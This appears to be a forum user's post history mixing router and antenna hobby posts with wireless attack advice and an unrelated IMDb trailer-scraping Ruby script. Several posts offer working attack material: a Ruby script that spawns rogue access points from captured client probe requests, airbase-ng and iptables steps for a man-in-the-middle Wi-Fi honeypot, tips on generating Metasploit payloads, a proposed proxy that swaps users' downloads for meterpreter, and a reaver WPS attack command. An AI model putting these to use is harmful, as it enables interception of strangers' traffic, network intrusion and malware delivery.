-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
I have destroyed my last wrt54g v6.... I was running some test with out a waterproof setup and now it wont broadcast...
So I have picked up a wrt54g v8 for 5$ WOot I need to splice the coax to a barrel connector and install ddwrt then ill mount one 9dbi alfa antenna on the roof and a 5dbi in our kitchen... repeater (free for life)
So what would you do with a wrt54g?
What have you done?
what firmware would you recommend?
can I install ruby and airbase-ng?
Antennas you ave built?
-
If you have worked out a solution document your work and write up some clean instuctions...
I have never followed any ssd tweeks I just did a quick install... love the ssd ;-)
-
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html?m=1
Nice example use of msfcli !
generating a payload and setting up the exploit handler is 2 commands... try the vnc payload :-)
-
Netstat -nlp | grep 443
-
Learn how to generate the payload with msfpayload. Then start exploit/multihandler...
don't rely on others scripts.
-
I have not attempted the yagi biquad. I have made the yagi 19 element and was unsatisfied. Each element must be positioned perfectly, if one is out of place then the rest will be useless...
So my idea of a perfect biquad yagi build would consist of each element could be sprayed with a metallic paint that is a conductor... stencil's could be made for precisely positioned elements on a plexy glass...
I still have better success with a parabolic dish and a single biquad for the driven element... I'm sure I could build one to fit in a bag you have picked...
-
if the network does not have internet access, try and DNS spoof all domain and IP to destination 80 on local apacheserver...
-
I have a droid thunderbolt with a nice extended powercell. The screen is broke so I can't see anything...
My question is can I root the device with a custom rom debian server edition? Then ssh into the device and now make good use of its wifi device?
can this be done with out a working screen?
-
Watch "Long range biquad. Home build" on YouTube
Long range biquad. Home build:
I have a few videos on some ddwrt with antenna builds. I used only things around the house. The video above is a biquad in a can and a parabolic dish HUGE gain from about 1000 feet away no lag during online gameplay
its all about the perfect parabolic dish...
-
iwconfig wlan0 channel 6
Ifcinfig wlan0 down
Iwconfig wlan0 mode monitor
Ifcinfig wlan up
Airbase-ng wlan0 -e test-ap-channel-6
New tab in console
Airodump-ng wlan0
So we have airodump channel Hopping and at the same time airbase is broadcasting a fake ap on channel 6...
On my linux mint everything is working as I need. My goal is to capture with airodump all client probe request and then start airbase on channel 6 with the newly captured probe request...
The problem is when I run this same commands above in kali linux. When airodump has your card in channel hop your same wlan device running airbase is also channel hopping...
Any ideas why linux mint allows me to accomplish this?
-
i had to boot up kali to get a working example of a fake ap with dnsmasq...
simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html
and dont forget to add iptables to complete your clients internet connection
wlan1 is established a connection to my droid hotspot 4g network... at0 traffic will now pass threw
iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPTecho 1 > /proc/sys/net/ipv4/ip_forward
-
Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives.
Labtop has 2 wifi devices. Wlan1 is connected to droid 4g 192.168.43.130
Wlan0 will be airbase-ng so should I set ifcinfig at0 192.168.44.1 up ? also how would u configure dhcp 192.168.0.100-250???
-
karma was trouble to install on my machine, i didnt fill like booting bt... so here is a fake ap script... it will capture clients probe request and start a new esid...
#start airodump-ng wlan0 -w airbase # this will simply scan airbase.csv file for client probe @pid_list=[]# this will hold the list of running esids, "netgear", "freewifi", "cisco" def refresh_list # read a airodump.csv file and sort threw clients data=File.open("airbase-01.csv","r") block=data.read cut=block.index("\r\n\r\n") block_1=block[146..cut] # here is your list of accespoints... block_2=block[cut+90..-1] # here is your list of clients buff=[] block_2.each_line{|x| buff<< x.split(",")[5..-1]} buff.uniq.each{|x| if not x==nil x.each{|y| if not y.include?(":") if not y.include?("(not associated)") y.map(&:strip).each{|z| if z.size>=1 if not @pid_list.include?(z) Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")} @pid_list<<z end end } end end } end } end refresh_list while true sleep 10 refresh_list end
-
If I may try...
Think about a walky talky. Those hand held radio's can change channels by pressing a button...
If you and your friend have both walky talkies on channle 1 then you can share a conversation...
Your walky talkie can also channle hop. Could allow you to listen to all conversation on all channels by changing channels quickly.
If you notice when you run airodump your wifi card is channel hopping. trying to record data on all channel's
I tried :-)
Edit. misread the question..
-
verry true. browser COOKIE=finger. I guess I was thinking fingerprint of each client lol
If finger.include?("windows")
s.puts(meterpreter.exe)
End
Just example. Above...
if anyone is interested in a team project. I made this example a few years ago... (I ment to post in community projects....)
All the code is in my head, i have no time to build this.
Packet manipulation is much needed around here
-
Proxy source
http://pastebin.com/n7AHi5Ny
druring man in the middle, if a client downloads a executable of any kind... swap that data with meterpreter... I notice people request or ask for this kind of exploit...
Rar, zip, msi, exe etc...
maybe this community can help me build something from this proof of concept... -
Deleted sorry.
-
karma is the tool i seek...
-
I have found 1000 most common ssids. And my mistake for saying essids
-
My phone for example will automatically connect to dd-wrt. Can a clients saved access pont be guessed?
Airbase-ng wlan0 -e dd-wrt
Is there a essid dictionary file?
Maybe what am trying to do already exist?
-
From Droid...
There are a few steps you may have to take.
Maybe set uid in ettercap config.
Enable ipfarwording per iptables or ipchains os specific.
These 2 above would help u Google search
Content-length also plays a big part when moding data, always try something simple like replace(poo for pee)
Try several webpages during your test msn, yahoo etc... Not https...
I have some proof of concept I wrote in ruby, when a user downloads a executable during mitm, the binary data is replaced with a meterpreter shell
-
#will get trailers.... #depends on apt-get install rtmpdump and wget #set of rules for this to work... the name of the folder must be proper name as listed below, these names are also exact match from imdb #/media/500_gig/movies/21 jump street (2012)/movie_file.avi <-------- GOOD #/media/500_gig/movies/21_jump_street_xvid_crap/movie_file.avi <--- BAD #example # ls /media/500_gig/movies/ # 21 Jump Street (2012) # antitrust (2001) # Avatar (2009) # Basketball diaries (1995) # be kind rewind (2008) # blank check (1994) # blow (2001) # buffalo soldiers (2001) #run this script from any directory... the destination derectory must be changed below #sudo ruby get_trailer "movie name (2000)"
Need sudo to write data to hard drive
require 'socket' require 'cgi' puts movie_name=ARGV[0] dst_dir="/media/6E88F3A627ADD9B7/movies/#{movie_name}/" #- <--------change this movie_name=movie_name.gsub(" ","+").chomp s=TCPSocket.open("www.imdb.com",80) s.print("GET /find?q=#{movie_name} HTTP/1.0\r\n\r\n") buff="" while line=s.gets buff<<line end s.close #gather movie_home link buff=buff.gsub('"',"") ping=buff.index("/title/") if ping==nil puts"EXIT: next" else movie_home=buff[ping..ping+16] # IFRAME home page / Root page crawl from starrting point tt=buff[ping+7..ping+15] end s=TCPSocket.open("www.imdb.com",80) buff1="" s.print("GET /title/#{tt}/ HTTP/1.0\r\n\r\n") while line=s.gets buff1<<line end s.close image_link=buff1.scan(/media.rm.*./).to_s[0..26] # media/rm871673856/tt1232829 rm=buff1.scan(/media.rm.*./).to_s[0..26].scan(/\/.*.\//).to_s buff2="" s=TCPSocket.open("www.imdb.com",80) s.print("GET /media#{rm}#{tt}/ HTTP/1.0\r\n\r\n") while line=s.gets buff2<<line end s.close if ping=buff1.index("video/imdb/vi") double_trailer_prevent=1 puts trailer_home=buff1[ping..ping+28] trailer_home=trailer_home.scan(/video.imdb.vi.*.\//) payload="GET /#{trailer_home}player?stop=0 HTTP/1.1 Host: www.imdb.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive " buff3="" s=TCPSocket.open("www.imdb.com",80) s.print(payload) while line=s.recv(5000) buff3<<line if buff3.include?("</html>") break end end s.close buff3=buff3.gsub('"',"") ping=buff3.index("so.addVariable(file, ") pong=buff3.index(");",ping) v_file=buff3[ping+21..pong-1] v_file=CGI.unescape(v_file) if v_file.include?("rtmp") ping=buff3.index("so.addVariable(id, ") pong=buff3.index(");",ping) v_id=buff3[ping+19..pong-1] v_id=CGI.unescape(v_id) q='"' puts"\n" system("rtmpdump -r #{q}rtmp://amazonimdb.fcod.llnwd.net/a2643#{q} -a #{q}a2643#{q} -f #{q}LNX 11,2,202,243#{q} -W #{q}http://www.imdb.com/images/js/app/video/mediaplayer.swf#{q} -p #{q}http://www.imdb.com#{q} -y #{q}#{v_id}#{q} -o '#{dst_dir}trailer.flv'") end end if ping=buff1.index("video/screenplay/vi") if double_trailer_prevent==1 puts "double file download attempt" exit end puts trailer_home=buff1[ping..ping+30] trailer_home=trailer_home.scan(/video.screenplay.vi.*.\//) payload="GET /#{trailer_home}player?stop=0 HTTP/1.1 Host: www.imdb.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive " buff3="" s=TCPSocket.open("www.imdb.com",80) s.print(payload) while line=s.recv(5000) buff3<<line if buff3.include?("</html>") break end end s.close buff3=buff3.gsub('"',"") ping=buff3.index("so.addVariable(file, ") pong=buff3.index(");",ping) v_file=buff3[ping+21..pong-1] v_file=CGI.unescape(v_file) if v_file.include?("http") puts"\n" system("wget '#{v_file}' -O '#{dst_dir}trailer.flv'") end end
So, its ugly... dont judge me... it was sucessfull 95% (wrong name = fail, or trailer does not exist)
there is no error checking... now to process a hole list will take another small script...
irb mode...
data=`ls /media/500_gig/movies/` for movie_name in data.map system("ruby get_trailer.rb 'movie_name.chomp'") end
Now i hope to get some help with a template for the site... i just want to scrole threw a list of images like netflix... can some one contribute?
im verry noob with building a webpage... so maybe some decent example code would be apriceated...
-
Droid response,
That is the easy download, I was sucessful lastnight with downloading RTMP stream :-) I got everything on order now just need to mod my script then launch
-
(first post was from a droid so was quick_ now i have example to share)
i have been using wireshark, tcpick, burp to investigate my way threw traffic and this is a working download request... you can try if you like or take my work for it...
nc progressive.totaleclips.com.edgesuite.net > out.mp4 GET /127/e12782_301.mp4?eclipId=e12782&bitrateId=471&vendorId=102&type=.mp4&sp_ubid=746-5916787-1173752 HTTP/1.1 Host: progressive.totaleclips.com.edgesuite.net User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://www.imdb.com/images/js/app/video/mediaplayer.swf
(working on some examples for another reply)
Word list help
in Questions
Posted
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
Try reaver... my first try was success... you ned a decent signal for this attack...
now For cracking the hash...
get the big wpa wordlist I think g0tmilk has download links on his blog... I have seen this work almost everytime... must have gpu power... purehate has good tutorials for proper driver installation...